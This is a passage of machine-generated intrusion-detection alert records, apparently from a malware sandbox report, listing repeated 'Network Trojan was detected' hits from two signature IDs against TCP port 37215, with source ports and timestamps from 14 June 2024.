                SID:2829579
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291828
                SID:2829579
                Source Port:40620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344137
                SID:2835222
                Source Port:41802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289753
                SID:2829579
                Source Port:38052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666175
                SID:2835222
                Source Port:44938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545754
                SID:2829579
                Source Port:42322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546442
                SID:2829579
                Source Port:56600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028013
                SID:2829579
                Source Port:34142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807926
                SID:2835222
                Source Port:55078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230740
                SID:2829579
                Source Port:45532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734938
                SID:2829579
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644237
                SID:2835222
                Source Port:44970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502206
                SID:2829579
                Source Port:36526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778331
                SID:2829579
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857641
                SID:2835222
                Source Port:39754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980345
                SID:2829579
                Source Port:51748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340643
                SID:2835222
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244007
                SID:2829579
                Source Port:36926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367058
                SID:2829579
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663855
                SID:2829579
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145933
                SID:2835222
                Source Port:55474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384441
                SID:2835222
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419866
                SID:2829579
                Source Port:44324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910512
                SID:2835222
                Source Port:55562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319628
                SID:2835222
                Source Port:56376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151514
                SID:2835222
                Source Port:43960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941538
                SID:2829579
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828559
                SID:2829579
                Source Port:51732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977416
                SID:2829579
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053852
                SID:2835222
                Source Port:58064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055509
                SID:2829579
                Source Port:43156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967181
                SID:2829579
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580803
                SID:2835222
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152123
                SID:2829579
                Source Port:51756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326450
                SID:2829579
                Source Port:34742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547241
                SID:2835222
                Source Port:55360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381385
                SID:2829579
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472622
                SID:2835222
                Source Port:49916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977998
                SID:2835222
                Source Port:57058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024123
                SID:2835222
                Source Port:46574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915745
                SID:2835222
                Source Port:35154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702259
                SID:2835222
                Source Port:44780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734421
                SID:2835222
                Source Port:57060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661830
                SID:2829579
                Source Port:51512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230141
                SID:2835222
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625202
                SID:2829579
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759613
                SID:2835222
                Source Port:33634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729521
                SID:2835222
                Source Port:56950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829316
                SID:2829579
                Source Port:32878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521576
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806027
                SID:2835222
                Source Port:34710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830840
                SID:2829579
                Source Port:36502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941743
                SID:2835222
                Source Port:37814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811288
                SID:2835222
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406537
                SID:2829579
                Source Port:43226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808834
                SID:2829579
                Source Port:37760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645611
                SID:2829579
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013445
                SID:2829579
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547554
                SID:2835222
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163692
                SID:2835222
                Source Port:38504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185321
                SID:2835222
                Source Port:38086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990060
                SID:2829579
                Source Port:36628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702431
                SID:2835222
                Source Port:37462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736019
                SID:2829579
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366685
                SID:2835222
                Source Port:59394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182033
                SID:2829579
                Source Port:35904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517263
                SID:2835222
                Source Port:37132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325854
                SID:2835222
                Source Port:54898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829603
                SID:2835222
                Source Port:40598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252996
                SID:2835222
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291722
                SID:2835222
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132242
                SID:2829579
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675772
                SID:2829579
                Source Port:54048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027979
                SID:2829579
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012277
                SID:2835222
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914514
                SID:2835222
                Source Port:52444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045398
                SID:2829579
                Source Port:49826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683978
                SID:2829579
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016396
                SID:2835222
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325582
                SID:2835222
                Source Port:52512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725893
                SID:2835222
                Source Port:52006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807968
                SID:2835222
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133655
                SID:2829579
                Source Port:60450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408940
                SID:2829579
                Source Port:50148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084698
                SID:2835222
                Source Port:59086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625336
                SID:2829579
                Source Port:59924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640669
                SID:2829579
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669211
                SID:2835222
                Source Port:42696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520344
                SID:2829579
                Source Port:40368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831545
                SID:2835222
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766740
                SID:2829579
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977448
                SID:2829579
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718049
                SID:2829579
                Source Port:44322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792631
                SID:2835222
                Source Port:45276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162375
                SID:2835222
                Source Port:37246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979135
                SID:2829579
                Source Port:33206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678853
                SID:2835222
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734301
                SID:2829579
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567515
                SID:2835222
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803456
                SID:2829579
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071340
                SID:2829579
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661523
                SID:2835222
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518411
                SID:2835222
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133241
                SID:2829579
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793058
                SID:2835222
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014527
                SID:2835222
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913355
                SID:2835222
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419531
                SID:2835222
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182228
                SID:2835222
                Source Port:46006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761807
                SID:2829579
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645291
                SID:2829579
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337828
                SID:2829579
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807156
                SID:2835222
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762033
                SID:2835222
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011180
                SID:2835222
                Source Port:57178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564805
                SID:2829579
                Source Port:35232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968141
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202331
                SID:2829579
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805720
                SID:2829579
                Source Port:33282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032401
                SID:2829579
                Source Port:38754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805967
                SID:2829579
                Source Port:60092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150344
                SID:2829579
                Source Port:44404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159906
                SID:2829579
                Source Port:50938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182427
                SID:2829579
                Source Port:56144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984682
                SID:2829579
                Source Port:60788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675819
                SID:2829579
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150903
                SID:2829579
                Source Port:45916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325273
                SID:2829579
                Source Port:54678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410980
                SID:2835222
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021029
                SID:2835222
                Source Port:45526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152333
                SID:2829579
                Source Port:51378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700089
                SID:2829579
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075242
                SID:2835222
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805014
                SID:2829579
                Source Port:55894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660897
                SID:2835222
                Source Port:34334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227592
                SID:2835222
                Source Port:34044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861561
                SID:2835222
                Source Port:44578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564370
                SID:2829579
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907162
                SID:2835222
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408370
                SID:2829579
                Source Port:44348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916017
                SID:2829579
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846347
                SID:2829579
                Source Port:37268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980692
                SID:2829579
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503957
                SID:2829579
                Source Port:37458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565849
                SID:2829579
                Source Port:56618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503729
                SID:2829579
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944276
                SID:2835222
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969071
                SID:2835222
                Source Port:46550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791204
                SID:2835222
                Source Port:46508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811104
                SID:2829579
                Source Port:35508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501717
                SID:2835222
                Source Port:34624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504379
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180722
                SID:2829579
                Source Port:32860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053801
                SID:2835222
                Source Port:53454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518125
                SID:2829579
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847917
                SID:2829579
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382459
                SID:2835222
                Source Port:42434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980725
                SID:2829579
                Source Port:36308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451942
                SID:2835222
                Source Port:57670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968358
                SID:2835222
                Source Port:38634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021590
                SID:2829579
                Source Port:54404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848128
                SID:2829579
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505047
                SID:2835222
                Source Port:59980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382051
                SID:2835222
                Source Port:33818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980080
                SID:2835222
                Source Port:34640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614540
                SID:2829579
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985070
                SID:2829579
                Source Port:55222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025164
                SID:2835222
                Source Port:60540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944551
                SID:2835222
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111642
                SID:2835222
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811871
                SID:2829579
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971883
                SID:2829579
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829227
                SID:2835222
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201132
                SID:2829579
                Source Port:48516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916392
                SID:2829579
                Source Port:59204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617380
                SID:2835222
                Source Port:56098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088850
                SID:2829579
                Source Port:47596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861712
                SID:2829579
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024526
                SID:2829579
                Source Port:56640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165160
                SID:2835222
                Source Port:53160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368343
                SID:2835222
                Source Port:52944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972151
                SID:2829579
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293748
                SID:2835222
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410540
                SID:2835222
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453930
                SID:2835222
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967516
                SID:2835222
                Source Port:40630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804157
                SID:2829579
                Source Port:55034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672398
                SID:2835222
                Source Port:42528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898385
                SID:2835222
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202804
                SID:2829579
                Source Port:46344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717457
                SID:2829579
                Source Port:36660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420898
                SID:2829579
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291645
                SID:2835222
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898139
                SID:2829579
                Source Port:56464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273510
                SID:2829579
                Source Port:46698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700032
                SID:2835222
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034018
                SID:2829579
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807207
                SID:2829579
                Source Port:53136
                Destination Port:37215
